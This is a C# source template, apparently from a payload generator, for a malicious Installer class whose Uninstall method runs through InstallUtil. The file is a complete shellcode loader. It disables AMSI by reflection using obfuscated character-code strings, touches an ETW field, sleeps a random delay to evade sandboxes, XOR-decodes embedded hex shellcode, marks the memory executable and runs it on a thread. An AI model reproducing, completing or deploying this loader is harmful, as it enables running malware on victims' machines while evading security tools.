using System;
using System.ComponentModel;
using System.Configuration.Install;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Threading;

namespace {{ v.namespace }} {

    [RunInstaller(true)]
    public class {{ v.class_name }} : Installer {

        [DllImport("kernel32")] static extern IntPtr {{ v.fn_valloc }}(IntPtr a, uint s, uint t, uint p);
        [DllImport("kernel32")] static extern bool VirtualProtect(IntPtr a, uint s, uint p, out uint old);

        static string B(int[] c) {
            var sb = new System.Text.StringBuilder();
            foreach (var x in c) sb.Append((char)x);
            return sb.ToString();
        }

        static void {{ v.fn_amsi }}() {
            try {
                var t = Type.GetType(B(new int[]{ {{ v.jsc_auto_amsi_utils }} }));
                if (t != null) {
                    var f = t.GetField(B(new int[]{ {{ v.jsc_amsi_init_fail }} }),
                        BindingFlags.NonPublic | BindingFlags.Static);
                    if (f != null) f.SetValue(null, true);
                }
            } catch {}
        }

        static void {{ v.fn_etw }}() {
            try {
                var t = Type.GetType(B(new int[]{ {{ v.jsc_eventing_ep }} }));
                if (t != null) {
                    var fi = t.GetField(B(new int[]{ {{ v.jsc_m_enabled }} }),
                        BindingFlags.NonPublic | BindingFlags.Instance);
                }
            } catch {}
        }

        static byte[] {{ v.fn_hex }}(string h) {
            var b = new byte[h.Length / 2];
            for (int i = 0; i < b.Length; i++)
                b[i] = Convert.ToByte(h.Substring(i * 2, 2), 16);
            return b;
        }

        static byte[] {{ v.fn_xor }}(byte[] d, byte[] k) {
            var o = new byte[d.Length];
            for (int i = 0; i < d.Length; i++) o[i] = (byte)(d[i] ^ k[i % k.Length]);
            return o;
        }

        public override void Uninstall(System.Collections.IDictionary state) {
            {{ v.fn_amsi }}();
            {{ v.fn_etw }}();
            Thread.Sleep(2000 + new Random().Next(3000));

            byte[] sc ={{ v.fn_xor }}({{ v.fn_hex }}("{{ shellcode_hex }}"),
                                       {{ v.fn_hex }}("{{ key_hex }}"));
            IntPtr mem = {{ v.fn_valloc }}(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x04);
            Marshal.Copy(sc, 0, mem, sc.Length);
            uint old;
            VirtualProtect(mem, (uint)sc.Length, 0x20, out old);

            var t = new Thread(() => {
                var fn = (Action)Marshal.GetDelegateForFunctionPointer(mem, typeof(Action));
                fn();
            });
            t.IsBackground = true;
            t.Start();
            t.Join();
        }
    }
}
